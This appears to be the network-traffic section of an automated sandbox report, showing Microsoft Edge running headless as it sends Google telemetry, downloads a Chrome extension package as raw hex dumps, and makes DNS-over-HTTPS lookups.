                                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                                  Origin: chrome-untrusted://new-tab-page
                                                                                                                                                                                                                                                                                                                  X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:14 UTC913OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 33 36 34 31 36 37 35 31 39 39 33 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c
                                                                                                                                                                                                                                                                                                                  Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],373,[["1736416751993",null,null,null,
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:14 UTC918INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: chrome-untrusted://new-tab-page
                                                                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                                                                                                                                                                                                                  Set-Cookie: NID=520=NSIHbnOuyGsHwQqtqOrUsuozBQdQz52u9xXTDA6JVOQkgDwElfRK1E7dNylFPufWhdnCAC1crNPySQdJMS2Pi12AOGr9V8R3dmgtMSCfyx3-t4LY3Lsz2j3dX3cwmaVViBOyMj9iO79AAqFcoZl4Gbi5lkstbs_mMye_R54QFSOAV2WY1shSY-A; expires=Fri, 11-Jul-2025 09:59:14 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                                                                                                                                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Date: Thu, 09 Jan 2025 09:59:14 GMT
                                                                                                                                                                                                                                                                                                                  Server: Playlog
                                                                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                  Expires: Thu, 09 Jan 2025 09:59:14 GMT
                                                                                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:14 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  7192.168.2.460849142.250.185.1934438124C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:20 UTC602OUTGET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:21 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  X-GUploader-UploadID: AFiumC60FXRFlnBRBQi3LEUQz5M9VCEpErAbNS4XBkrIk4uwQb-qy4IaP1uysfsIwpme-vjK
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                  Content-Length: 154477
                                                                                                                                                                                                                                                                                                                  X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                                                                  Server: UploadServer
                                                                                                                                                                                                                                                                                                                  Date: Wed, 08 Jan 2025 15:58:13 GMT
                                                                                                                                                                                                                                                                                                                  Expires: Thu, 08 Jan 2026 15:58:13 GMT
                                                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                                  Age: 64867
                                                                                                                                                                                                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                                                                  ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                                                                  Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:21 UTC827INData Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                                                                                  Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:21 UTC1390INData Raw: d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72 0e cf 9c ab 3d a2
                                                                                                                                                                                                                                                                                                                  Data Ascii: Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr=
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:21 UTC1390INData Raw: fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd 1a e5 55 bd 63 44
                                                                                                                                                                                                                                                                                                                  Data Ascii: @uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[uUcD
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:21 UTC1390INData Raw: ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd 7f 57 ce c3 98 bb
                                                                                                                                                                                                                                                                                                                  Data Ascii: VkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iGW
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:21 UTC1390INData Raw: fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a be f9 ed d4 c0 dd
                                                                                                                                                                                                                                                                                                                  Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:21 UTC1390INData Raw: 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83
                                                                                                                                                                                                                                                                                                                  Data Ascii: s=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>v
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:21 UTC1390INData Raw: 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c b9 05 91 82
                                                                                                                                                                                                                                                                                                                  Data Ascii: =K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:21 UTC1390INData Raw: fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa b3 5c b7 89
                                                                                                                                                                                                                                                                                                                  Data Ascii: fO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F\
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:21 UTC1390INData Raw: 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51 39 f9 af 05
                                                                                                                                                                                                                                                                                                                  Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN1 Q9
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:21 UTC1390INData Raw: 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63
                                                                                                                                                                                                                                                                                                                  Data Ascii: QNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  8192.168.2.460879162.159.61.34438124C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:23 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:23 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:23 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                                  Date: Thu, 09 Jan 2025 09:59:23 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                                  CF-RAY: 8ff39304cc570ca4-EWR
                                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:23 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 d1 00 04 8e fb 28 83 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  9192.168.2.460878172.64.41.34438124C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:23 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:23 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                                  2025-01-09 09:59:23 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                                  Date: Thu, 09 Jan 2025 09:59:23 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                  Content-Length: 468
